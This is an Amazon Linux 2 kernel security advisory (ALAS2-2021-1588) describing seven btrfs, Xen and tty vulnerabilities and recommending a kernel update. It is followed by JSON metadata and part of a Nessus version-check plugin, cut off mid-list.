ID ALAS2-2021-1588 Type amazon Reporter Amazon Modified 2021-01-26T18:56:00
Description
Issue Overview:
In the Linux kernel 5.0.21, mounting a crafted btrfs filesystem image, performing some operations, and then making a syncfs system call can lead to a use-after-free in __mutex_lock in kernel/locking/mutex.c. This is related to mutex_can_spin_on_owner in kernel/locking/mutex.c, __btrfs_qgroup_free_meta in fs/btrfs/qgroup.c, and btrfs_insert_delayed_items in fs/btrfs/delayed-inode.c. (CVE-2019-19813)
A flaw was found in the implementation of the BTRFS file system code in the Linux kernel. An attacker, who is able to mount a crafted BTRFS filesystem and perform common filesystem operations, can possibly cause an out-of-bounds write to memory. This could lead to memory corruption or privilege escalation. (CVE-2019-19816)
This flaw is rated as having Moderate impact, there is a possibility that there is a write, although it is an uncontrolled write in a fixed offset from the current location. Also this issue is in non-default filesystem. (CVE-2020-27815)
An issue was discovered in Xen through 4.14.x. Some OSes (such as Linux, FreeBSD, and NetBSD) are processing watch events using a single thread. If the events are received faster than the thread is able to handle, they will get queued. As the queue is unbounded, a guest may be able to trigger an OOM in the backend. All systems with a FreeBSD, Linux, or NetBSD (any version) dom0 are vulnerable. (cve-2020-29568)
An issue was discovered in the Linux kernel through 5.10.1, as used with Xen through 4.14.x. The Linux kernel PV block backend expects the kernel thread handler to reset ring->xenblkd to NULL when stopped. However, the handler may not have time to run if the frontend quickly toggles between the states connect and disconnect. As a consequence, the block backend may re-use a pointer after it was freed. A misbehaving guest can trigger a dom0 crash by continuously connecting / disconnecting a block frontend. Privilege escalation and information leaks cannot be ruled out. This only affects systems with a Linux blkback. (cve-2020-29569)
A locking inconsistency issue was discovered in the tty subsystem of the Linux kernel through 5.9.13. drivers/tty/tty_io.c and drivers/tty/tty_jobctrl.c may allow a read-after-free attack against TIOCGSID, aka CID-c8bcd9c5be24. (CVE-2020-29660)
A locking vulnerability was found in the tty subsystem of the Linux kernel in drivers/tty/tty_jobctrl.c. This flaw allows a local attacker to possibly corrupt memory or escalate privileges. The highest threat from this vulnerability is to confidentiality, integrity, as well as system availability. (CVE-2020-29661)
Affected Packages:
kernel
Issue Correction:
Run yum update kernel to update your system.
{"id": "ALAS2-2021-1588", "type": "amazon", "bulletinFamily": "unix", "title": "Important: kernel", "description": "**Issue Overview:**\n\nIn the Linux kernel 5.0.21, mounting a crafted btrfs filesystem image, performing some operations, and then making a syncfs system call can lead to a use-after-free in __mutex_lock in kernel/locking/mutex.c. This is related to mutex_can_spin_on_owner in kernel/locking/mutex.c, __btrfs_qgroup_free_meta in fs/btrfs/qgroup.c, and btrfs_insert_delayed_items in fs/btrfs/delayed-inode.c. (CVE-2019-19813)\n\nA flaw was found in the implementation of the BTRFS file system code in the Linux kernel. An attacker, who is able to mount a crafted BTRFS filesystem and perform common filesystem operations, can possibly cause an out-of-bounds write to memory. This could lead to memory corruption or privilege escalation. (CVE-2019-19816)\n\nThis flaw is rated as having Moderate impact, there is a possibility that there is a write, although it is an uncontrolled write in a fixed offset from the current location. Also this issue is in non-default filesystem. (CVE-2020-27815)\n\nAn issue was discovered in Xen through 4.14.x. Some OSes (such as Linux, FreeBSD, and NetBSD) are processing watch events using a single thread. If the events are received faster than the thread is able to handle, they will get queued. As the queue is unbounded, a guest may be able to trigger an OOM in the backend. All systems with a FreeBSD, Linux, or NetBSD (any version) dom0 are vulnerable. ([cve-2020-29568](<https://nvd.nist.gov/vuln/detail/CVE%2D2020%2D29568>))\n\nAn issue was discovered in the Linux kernel through 5.10.1, as used with Xen through 4.14.x. The Linux kernel PV block backend expects the kernel thread handler to reset ring->xenblkd to NULL when stopped. However, the handler may not have time to run if the frontend quickly toggles between the states connect and disconnect. As a consequence, the block backend may re-use a pointer after it was freed. A misbehaving guest can trigger a dom0 crash by continuously connecting / disconnecting a block frontend. Privilege escalation and information leaks cannot be ruled out. This only affects systems with a Linux blkback. ([cve-2020-29569](<https://nvd.nist.gov/vuln/detail/CVE%2D2020%2D29569>))\n\nA locking inconsistency issue was discovered in the tty subsystem of the Linux kernel through 5.9.13. drivers/tty/tty_io.c and drivers/tty/tty_jobctrl.c may allow a read-after-free attack against TIOCGSID, aka CID-c8bcd9c5be24. (CVE-2020-29660)\n\nA locking vulnerability was found in the tty subsystem of the Linux kernel in drivers/tty/tty_jobctrl.c. This flaw allows a local attacker to possibly corrupt memory or escalate privileges. The highest threat from this vulnerability is to confidentiality, integrity, as well as system availability. (CVE-2020-29661)\n\n \n**Affected Packages:** \n\n\nkernel\n\n \n**Issue Correction:** \nRun _yum update kernel_ to update your system. \n\n\n \n\n\n**New Packages:**\n \n \n aarch64: \n \u00a0\u00a0\u00a0 kernel-4.14.214-160.339.amzn2.aarch64 \n \u00a0\u00a0\u00a0 kernel-headers-4.14.214-160.339.amzn2.aarch64 \n \u00a0\u00a0\u00a0 kernel-debuginfo-common-aarch64-4.14.214-160.339.amzn2.aarch64 \n \u00a0\u00a0\u00a0 perf-4.14.214-160.339.amzn2.aarch64 \n \u00a0\u00a0\u00a0 perf-debuginfo-4.14.214-160.339.amzn2.aarch64 \n \u00a0\u00a0\u00a0 python-perf-4.14.214-160.339.amzn2.aarch64 \n \u00a0\u00a0\u00a0 python-perf-debuginfo-4.14.214-160.339.amzn2.aarch64 \n \u00a0\u00a0\u00a0 kernel-tools-4.14.214-160.339.amzn2.aarch64 \n \u00a0\u00a0\u00a0 kernel-tools-devel-4.14.214-160.339.amzn2.aarch64 \n \u00a0\u00a0\u00a0 kernel-tools-debuginfo-4.14.214-160.339.amzn2.aarch64 \n \u00a0\u00a0\u00a0 kernel-devel-4.14.214-160.339.amzn2.aarch64 \n \u00a0\u00a0\u00a0 kernel-debuginfo-4.14.214-160.339.amzn2.aarch64 \n \n i686: \n \u00a0\u00a0\u00a0 kernel-headers-4.14.214-160.339.amzn2.i686 \n \n src: \n \u00a0\u00a0\u00a0 kernel-4.14.214-160.339.amzn2.src \n \n x86_64: \n \u00a0\u00a0\u00a0 kernel-4.14.214-160.339.amzn2.x86_64 \n \u00a0\u00a0\u00a0 kernel-headers-4.14.214-160.339.amzn2.x86_64 \n \u00a0\u00a0\u00a0 kernel-debuginfo-common-x86_64-4.14.214-160.339.amzn2.x86_64 \n \u00a0\u00a0\u00a0 perf-4.14.214-160.339.amzn2.x86_64 \n \u00a0\u00a0\u00a0 perf-debuginfo-4.14.214-160.339.amzn2.x86_64 \n \u00a0\u00a0\u00a0 python-perf-4.14.214-160.339.amzn2.x86_64 \n \u00a0\u00a0\u00a0 python-perf-debuginfo-4.14.214-160.339.amzn2.x86_64 \n \u00a0\u00a0\u00a0 kernel-tools-4.14.214-160.339.amzn2.x86_64 \n \u00a0\u00a0\u00a0 kernel-tools-devel-4.14.214-160.339.amzn2.x86_64 \n \u00a0\u00a0\u00a0 kernel-tools-debuginfo-4.14.214-160.339.amzn2.x86_64 \n \u00a0\u00a0\u00a0 kernel-devel-4.14.214-160.339.amzn2.x86_64 \n \u00a0\u00a0\u00a0 kernel-debuginfo-4.14.214-160.339.amzn2.x86_64 \n \u00a0\u00a0\u00a0 kernel-livepatch-4.14.214-160.339-1.0-0.amzn2.x86_64 \n \n \n", "published": "2021-01-25T23:09:00", "modified": "2021-01-26T18:56:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "href": "https://alas.aws.amazon.com/AL2/ALAS-2021-1588.html", "reporter": "Amazon", "references": [], "cvelist": ["CVE-2019-19813", "CVE-2019-19816", "CVE-2020-27815", "CVE-2020-29568", "CVE-2020-29569", "CVE-2020-29660", "CVE-2020-29661"], "immutableFields": [], "lastseen": "2021-07-25T19:35:45", "viewCount": 22, "enchantments": {"dependencies": {"references": [{"type": "nessus", "idList": ["DEBIAN_DLA-2557.NASL", "UBUNTU_USN-4749-1.NASL", "PHOTONOS_PHSA-2021-3_0-0182_LINUX.NASL", "PHOTONOS_PHSA-2020-2_0-0287_LINUX.NASL", "ALA_ALAS-2021-1477.NASL", "UBUNTU_USN-4748-1.NASL", "UBUNTU_USN-4750-1.NASL", "FEDORA_2020-B732958765.NASL", "AL2_ALAS-2021-1588.NASL", "DEBIAN_DSA-4843.NASL"]}, {"type": "amazon", "idList": ["ALAS-2021-1477"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2020-29568", "UB:CVE-2020-29569", "UB:CVE-2020-27815", "UB:CVE-2019-19816", "UB:CVE-2020-29661", "UB:CVE-2020-29660", "UB:CVE-2019-19813"]}, {"type": "cve", "idList": ["CVE-2020-27815", "CVE-2020-29568", "CVE-2020-29660", "CVE-2020-29569", "CVE-2019-19816", "CVE-2020-29661", "CVE-2019-19813"]}, {"type": "redhatcve", "idList": ["RH:CVE-2020-29661", "RH:CVE-2020-29660", "RH:CVE-2019-19816", "RH:CVE-2019-19813", "RH:CVE-2020-27815"]}, {"type": "ubuntu", "idList": ["USN-4708-1", "USN-4750-1", "USN-4749-1", "USN-4751-1", "USN-4709-1", "USN-4748-1"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/HUAWEI-EULEROS-2_0_SP3-CVE-2020-29661/", "MSF:ILITIES/HUAWEI-EULEROS-2_0_SP5-CVE-2020-29660/"]}, {"type": "cloudfoundry", "idList": ["CFOUNDRY:6842286EED83D27526CFF6743C20F98E"]}, {"type": "debian", "idList": ["DEBIAN:DLA-2557-1:3E233", "DEBIAN:DSA-4843-1:3B37B", "DEBIAN:DLA-2586-1:6B2FD"]}, {"type": "fedora", "idList": ["FEDORA:1F1BC30987DA", "FEDORA:824E230A6A04"]}, {"type": "oraclelinux", "idList": ["ELSA-2021-9024", "ELSA-2021-9006", "ELSA-2021-9023", "ELSA-2021-9030", "ELSA-2021-9025", "ELSA-2021-9052", "ELSA-2021-9009", "ELSA-2021-9038", "ELSA-2021-9037"]}, {"type": "xen", "idList": ["XSA-350", "XSA-349"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2021:0075-1", "OPENSUSE-SU-2021:0241-1"]}, {"type": "freebsd", "idList": ["5D91370B-61FD-11EB-B87A-901B0EF719AB"]}, {"type": "virtuozzo", "idList": ["VZA-2021-008", "VZA-2021-006"]}, {"type": "redhat", "idList": ["RHSA-2021:0940", "RHSA-2021:1031"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:160681"]}], "modified": "2021-01-27T01:30:11", "rev": 2}, "score": {"value": 4.4, "vector": "NONE", "modified": "2021-01-27T01:30:11", "rev": 2}, "vulnersScore": 4.4}, "affectedPackage": [{"OS": "Amazon Linux", "OSVersion": "2", "packageFilename": "kernel-4.14.214-160.339.amzn2.aarch64.rpm", "arch": "aarch64", "packageVersion": "4.14.214-160.339.amzn2", "operator": "lt", "packageName": "kernel"}, {"OS": "Amazon Linux", "OSVersion": "2", "packageFilename": "kernel-headers-4.14.214-160.339.amzn2.aarch64.rpm", "arch": "aarch64", "packageVersion": "4.14.214-160.339.amzn2", "operator": "lt", "packageName": "kernel-headers"}, {"OS": "Amazon Linux", "OSVersion": "2", "packageFilename": "kernel-debuginfo-common-aarch64-4.14.214-160.339.amzn2.aarch64.rpm", "arch": "aarch64", "packageVersion": "4.14.214-160.339.amzn2", "operator": "lt", "packageName": "kernel-debuginfo-common-aarch64"}, {"OS": "Amazon Linux", "OSVersion": "2", "packageFilename": "perf-4.14.214-160.339.amzn2.aarch64.rpm", "arch": "aarch64", "packageVersion": "4.14.214-160.339.amzn2", "operator": "lt", "packageName": "perf"}, {"OS": "Amazon Linux", "OSVersion": "2", "packageFilename": "perf-debuginfo-4.14.214-160.339.amzn2.aarch64.rpm", "arch": "aarch64", "packageVersion": "4.14.214-160.339.amzn2", "operator": "lt", "packageName": "perf-debuginfo"}, {"OS": "Amazon Linux", "OSVersion": "2", "packageFilename": "python-perf-4.14.214-160.339.amzn2.aarch64.rpm", "arch": "aarch64", "packageVersion": "4.14.214-160.339.amzn2", "operator": "lt", "packageName": "python-perf"}, {"OS": "Amazon Linux", "OSVersion": "2", "packageFilename": "python-perf-debuginfo-4.14.214-160.339.amzn2.aarch64.rpm", "arch": "aarch64", "packageVersion": "4.14.214-160.339.amzn2", "operator": "lt", "packageName": "python-perf-debuginfo"}, {"OS": "Amazon Linux", "OSVersion": "2", "packageFilename": "kernel-tools-4.14.214-160.339.amzn2.aarch64.rpm", "arch": "aarch64", "packageVersion": "4.14.214-160.339.amzn2", "operator": "lt", "packageName": "kernel-tools"}, {"OS": "Amazon Linux", "OSVersion": "2", "packageFilename": "kernel-tools-devel-4.14.214-160.339.amzn2.aarch64.rpm", "arch": "aarch64", "packageVersion": "4.14.214-160.339.amzn2", "operator": "lt", "packageName": "kernel-tools-devel"}, {"OS": "Amazon Linux", "OSVersion": "2", "packageFilename": "kernel-tools-debuginfo-4.14.214-160.339.amzn2.aarch64.rpm", "arch": "aarch64", "packageVersion": "4.14.214-160.339.amzn2", "operator": "lt", "packageName": "kernel-tools-debuginfo"}, {"OS": "Amazon Linux", "OSVersion": "2", "packageFilename": "kernel-devel-4.14.214-160.339.amzn2.aarch64.rpm", "arch": "aarch64", "packageVersion": "4.14.214-160.339.amzn2", "operator": "lt", "packageName": "kernel-devel"}, {"OS": "Amazon Linux", "OSVersion": "2", "packageFilename": "kernel-debuginfo-4.14.214-160.339.amzn2.aarch64.rpm", "arch": "aarch64", "packageVersion": "4.14.214-160.339.amzn2", "operator": "lt", "packageName": "kernel-debuginfo"}, {"OS": "Amazon Linux", "OSVersion": "2", "packageFilename": "kernel-headers-4.14.214-160.339.amzn2.i686.rpm", "arch": "i686", "packageVersion": "4.14.214-160.339.amzn2", "operator": "lt", "packageName": "kernel-headers"}, {"OS": "Amazon Linux", "OSVersion": "2", "packageFilename": "kernel-4.14.214-160.339.amzn2.src.rpm", "arch": "src", "packageVersion": "4.14.214-160.339.amzn2", "operator": "lt", "packageName": "kernel"}, {"OS": "Amazon Linux", "OSVersion": "2", "packageFilename": "kernel-4.14.214-160.339.amzn2.x86_64.rpm", "arch": "x86_64", "packageVersion": "4.14.214-160.339.amzn2", "operator": "lt", "packageName": "kernel"}, {"OS": "Amazon Linux", "OSVersion": "2", "packageFilename": "kernel-headers-4.14.214-160.339.amzn2.x86_64.rpm", "arch": "x86_64", "packageVersion": "4.14.214-160.339.amzn2", "operator": "lt", "packageName": "kernel-headers"}, {"OS": "Amazon Linux", "OSVersion": "2", "packageFilename": "kernel-debuginfo-common-x86_64-4.14.214-160.339.amzn2.x86_64.rpm", "arch": "x86_64", "packageVersion": "4.14.214-160.339.amzn2", "operator": "lt", "packageName": "kernel-debuginfo-common-x86_64"}, {"OS": "Amazon Linux", "OSVersion": "2", "packageFilename": "perf-4.14.214-160.339.amzn2.x86_64.rpm", "arch": "x86_64", "packageVersion": "4.14.214-160.339.amzn2", "operator": "lt", "packageName": "perf"}, {"OS": "Amazon Linux", "OSVersion": "2", "packageFilename": "perf-debuginfo-4.14.214-160.339.amzn2.x86_64.rpm", "arch": "x86_64", "packageVersion": "4.14.214-160.339.amzn2", "operator": "lt", "packageName": "perf-debuginfo"}, {"OS": "Amazon Linux", "OSVersion": "2", "packageFilename": "python-perf-4.14.214-160.339.amzn2.x86_64.rpm", "arch": "x86_64", "packageVersion": "4.14.214-160.339.amzn2", "operator": "lt", "packageName": "python-perf"}, {"OS": "Amazon Linux", "OSVersion": "2", "packageFilename": "python-perf-debuginfo-4.14.214-160.339.amzn2.x86_64.rpm", "arch": "x86_64", "packageVersion": "4.14.214-160.339.amzn2", "operator": "lt", "packageName": "python-perf-debuginfo"}, {"OS": "Amazon Linux", "OSVersion": "2", "packageFilename": "kernel-tools-4.14.214-160.339.amzn2.x86_64.rpm", "arch": "x86_64", "packageVersion": "4.14.214-160.339.amzn2", "operator": "lt", "packageName": "kernel-tools"}, {"OS": "Amazon Linux", "OSVersion": "2", "packageFilename": "kernel-tools-devel-4.14.214-160.339.amzn2.x86_64.rpm", "arch": "x86_64", "packageVersion": "4.14.214-160.339.amzn2", "operator": "lt", "packageName": "kernel-tools-devel"}, {"OS": "Amazon Linux", "OSVersion": "2", "packageFilename": "kernel-tools-debuginfo-4.14.214-160.339.amzn2.x86_64.rpm", "arch": "x86_64", "packageVersion": "4.14.214-160.339.amzn2", "operator": "lt", "packageName": "kernel-tools-debuginfo"}, {"OS": "Amazon Linux", "OSVersion": "2", "packageFilename": "kernel-devel-4.14.214-160.339.amzn2.x86_64.rpm", "arch": "x86_64", "packageVersion": "4.14.214-160.339.amzn2", "operator": "lt", "packageName": "kernel-devel"}, {"OS": "Amazon Linux", "OSVersion": "2", "packageFilename": "kernel-debuginfo-4.14.214-160.339.amzn2.x86_64.rpm", "arch": "x86_64", "packageVersion": "4.14.214-160.339.amzn2", "operator": "lt", "packageName": "kernel-debuginfo"}, {"OS": "Amazon Linux", "OSVersion": "2", "packageFilename": "kernel-livepatch-4.14.214-160.339-1.0-0.amzn2.x86_64.rpm", "arch": "x86_64", "packageVersion": "1.0-0.amzn2", "operator": "lt", "packageName": "kernel-livepatch-4.14.214-160.339"}]}
{"nessus": [{"lastseen": "2021-01-29T01:17:57", "description": "The version of kernel installed on the remote host is prior to 4.14.214-160.339. It is, therefore, affected by multiple\nvulnerabilities as referenced in the ALAS2-2021-1588 advisory.\n\n - In the Linux kernel 5.0.21, mounting a crafted btrfs filesystem image, performing some operations, and\n then making a syncfs system call can lead to a use-after-free in __mutex_lock in kernel/locking/mutex.c.\n This is related to mutex_can_spin_on_owner in kernel/locking/mutex.c, __btrfs_qgroup_free_meta in\n fs/btrfs/qgroup.c, and btrfs_insert_delayed_items in fs/btrfs/delayed-inode.c. (CVE-2019-19813)\n\n - In the Linux kernel 5.0.21, mounting a crafted btrfs filesystem image and performing some operations can\n cause slab-out-of-bounds write access in __btrfs_map_block in fs/btrfs/volumes.c, because a value of 1 for\n the number of data stripes is mishandled. (CVE-2019-19816)\n\n - An issue was discovered in Xen through 4.14.x. Some OSes (such as Linux, FreeBSD, and NetBSD) are\n processing watch events using a single thread. If the events are received faster than the thread is able\n to handle, they will get queued. As the queue is unbounded, a guest may be able to trigger an OOM in the\n backend. All systems with a FreeBSD, Linux, or NetBSD (any version) dom0 are vulnerable. (CVE-2020-29568)\n\n - An issue was discovered in the Linux kernel through 5.10.1, as used with Xen through 4.14.x. The Linux\n kernel PV block backend expects the kernel thread handler to reset ring->xenblkd to NULL when stopped.\n However, the handler may not have time to run if the frontend quickly toggles between the states connect\n and disconnect. As a consequence, the block backend may re-use a pointer after it was freed. A misbehaving\n guest can trigger a dom0 crash by continuously connecting / disconnecting a block frontend. Privilege\n escalation and information leaks cannot be ruled out. This only affects systems with a Linux blkback.\n (CVE-2020-29569)\n\n - A locking inconsistency issue was discovered in the tty subsystem of the Linux kernel through 5.9.13.\n drivers/tty/tty_io.c and drivers/tty/tty_jobctrl.c may allow a read-after-free attack against TIOCGSID,\n aka CID-c8bcd9c5be24. (CVE-2020-29660)\n\n - A locking issue was discovered in the tty subsystem of the Linux kernel through 5.9.13.\n drivers/tty/tty_jobctrl.c allows a use-after-free attack against TIOCSPGRP, aka CID-54ffccbf053b.\n (CVE-2020-29661)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.", "edition": 2, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2021-01-26T00:00:00", "title": "Amazon Linux 2 : kernel (ALAS-2021-1588)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-19816", "CVE-2020-27815", "CVE-2019-19813", "CVE-2020-29569", "CVE-2020-29568", "CVE-2020-29661", "CVE-2020-29660"], "modified": "2021-01-26T00:00:00", "cpe": ["p-cpe:/a:amazon:linux:kernel-tools-debuginfo", "p-cpe:/a:amazon:linux:kernel", "p-cpe:/a:amazon:linux:kernel-debuginfo-common-aarch64", "p-cpe:/a:amazon:linux:kernel-livepatch-4.14.214-160.339", "p-cpe:/a:amazon:linux:python-perf", "cpe:/o:amazon:linux:2", "p-cpe:/a:amazon:linux:perf", "p-cpe:/a:amazon:linux:kernel-tools", "p-cpe:/a:amazon:linux:python-perf-debuginfo", "p-cpe:/a:amazon:linux:kernel-devel", "p-cpe:/a:amazon:linux:kernel-debuginfo-common-x86_64", "p-cpe:/a:amazon:linux:kernel-debuginfo", "p-cpe:/a:amazon:linux:perf-debuginfo", "p-cpe:/a:amazon:linux:kernel-tools-devel", "p-cpe:/a:amazon:linux:kernel-headers"], "id": "AL2_ALAS-2021-1588.NASL", "href": "https://www.tenable.com/plugins/nessus/145456", "sourceData": "##\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux 2 Security Advisory ALAS-2021-1588.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(145456);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/27\");\n\n script_cve_id(\n \"CVE-2019-19813\",\n \"CVE-2019-19816\",\n \"CVE-2020-27815\",\n \"CVE-2020-29568\",\n \"CVE-2020-29569\",\n \"CVE-2020-29660\",\n \"CVE-2020-29661\"\n );\n script_xref(name:\"ALAS\", value:\"2021-1588\");\n\n script_name(english:\"Amazon Linux 2 : kernel (ALAS-2021-1588)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Amazon Linux 2 host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of kernel installed on the remote host is prior to 4.14.214-160.339. It is, therefore, affected by multiple\nvulnerabilities as referenced in the ALAS2-2021-1588 advisory.\n\n - In the Linux kernel 5.0.21, mounting a crafted btrfs filesystem image, performing some operations, and\n then making a syncfs system call can lead to a use-after-free in __mutex_lock in kernel/locking/mutex.c.\n This is related to mutex_can_spin_on_owner in kernel/locking/mutex.c, __btrfs_qgroup_free_meta in\n fs/btrfs/qgroup.c, and btrfs_insert_delayed_items in fs/btrfs/delayed-inode.c. (CVE-2019-19813)\n\n - In the Linux kernel 5.0.21, mounting a crafted btrfs filesystem image and performing some operations can\n cause slab-out-of-bounds write access in __btrfs_map_block in fs/btrfs/volumes.c, because a value of 1 for\n the number of data stripes is mishandled. (CVE-2019-19816)\n\n - An issue was discovered in Xen through 4.14.x. Some OSes (such as Linux, FreeBSD, and NetBSD) are\n processing watch events using a single thread. If the events are received faster than the thread is able\n to handle, they will get queued. As the queue is unbounded, a guest may be able to trigger an OOM in the\n backend. All systems with a FreeBSD, Linux, or NetBSD (any version) dom0 are vulnerable. (CVE-2020-29568)\n\n - An issue was discovered in the Linux kernel through 5.10.1, as used with Xen through 4.14.x. The Linux\n kernel PV block backend expects the kernel thread handler to reset ring->xenblkd to NULL when stopped.\n However, the handler may not have time to run if the frontend quickly toggles between the states connect\n and disconnect. As a consequence, the block backend may re-use a pointer after it was freed. A misbehaving\n guest can trigger a dom0 crash by continuously connecting / disconnecting a block frontend. Privilege\n escalation and information leaks cannot be ruled out. This only affects systems with a Linux blkback.\n (CVE-2020-29569)\n\n - A locking inconsistency issue was discovered in the tty subsystem of the Linux kernel through 5.9.13.\n drivers/tty/tty_io.c and drivers/tty/tty_jobctrl.c may allow a read-after-free attack against TIOCGSID,\n aka CID-c8bcd9c5be24. (CVE-2020-29660)\n\n - A locking issue was discovered in the tty subsystem of the Linux kernel through 5.9.13.\n drivers/tty/tty_jobctrl.c allows a use-after-free attack against TIOCSPGRP, aka CID-54ffccbf053b.\n (CVE-2020-29661)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://alas.aws.amazon.com/AL2/ALAS-2021-1588.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2019-19813\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2019-19816\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-27815\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-29568\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-29569\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-29660\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-29661\");\n script_set_attribute(attribute:\"solution\", value:\n\"Run 'yum update kernel' to update your system.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-19816\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/12/17\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/01/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/01/26\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:kernel-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:kernel-debuginfo-common-aarch64\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:kernel-debuginfo-common-x86_64\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:kernel-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:kernel-livepatch-4.14.214-160.339\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:kernel-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:kernel-tools-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:kernel-tools-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:perf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:perf-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:python-perf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:python-perf-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux:2\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\ninclude(\"hotfixes.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/AmazonLinux/release\");\nif (isnull(release) || !strlen(release)) audit(AUDIT_OS_NOT, \"Amazon Linux\");\nos_ver = pregmatch(pattern: \"^AL(A|\\d)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Amazon Linux\");\nos_ver = os_ver[1];\nif (os_ver != \"2\")\n{\n if (os_ver == 'A') os_ver = 'AMI';\n audit(AUDIT_OS_NOT, \"Amazon Linux 2\", \"Amazon Linux \" + os_ver);\n}\n\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nif (get_one_kb_item(\"Host/kpatch/kernel-cves\"))\n{\n set_hotfix_type(\"kpatch\");\n cve_list = make_list(\"CVE-2019-19813\", \"CVE-2019-19816\", \"CVE-2020-27815\", \"CVE-2020-29568\", \"CVE-2020-29569\", \"CVE-2020-29660\", \"CVE-2020-29661\");\n if (hotfix_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"kpatch hotfix for ALAS-2021-1588\");\n }\n else\n {\n __rpm_report = hotfix_reporting_text();\n }\n}\npkgs = [\n {'reference':'kernel-4.14.214-160.339.amzn2', 'cpu':'aarch64', 'release':'AL2'},\n {'reference':'kernel-4.14.214-160.339.amzn2', 'cpu':'x86_64', 'release':'AL2'},\n {'reference':'kernel-debuginfo-4.14.214-160.339.amzn2', 'cpu':'aarch64', 'release':'AL2'},\n {'reference':'kernel-debuginfo-4.14.214-160.339.amzn2', 'cpu':'x86_64', 'release':'AL2'},\n {'reference':'kernel-debuginfo-common-aarch64-4.14.214-160.339.amzn2', 'cpu':'aarch64', 'release':'AL2'},\n {'reference':'kernel-debuginfo-common-x86_64-4.14.214-160.339.amzn2', 'cpu':'x86_64', 'release':'AL2'},\n {'reference':'kernel-devel-4.14.214-160.339.amzn2', 'cpu':'aarch64', 'release':'AL2'},\n {'reference':'kernel-devel-4.14.214-160.339.amzn2', 'cpu':'x86_64', 'release':'AL2'},\n {'reference':'kernel-headers-4.14.214-160.339.amzn2', 'cpu':'aarch64', 'release':'AL2'},\n 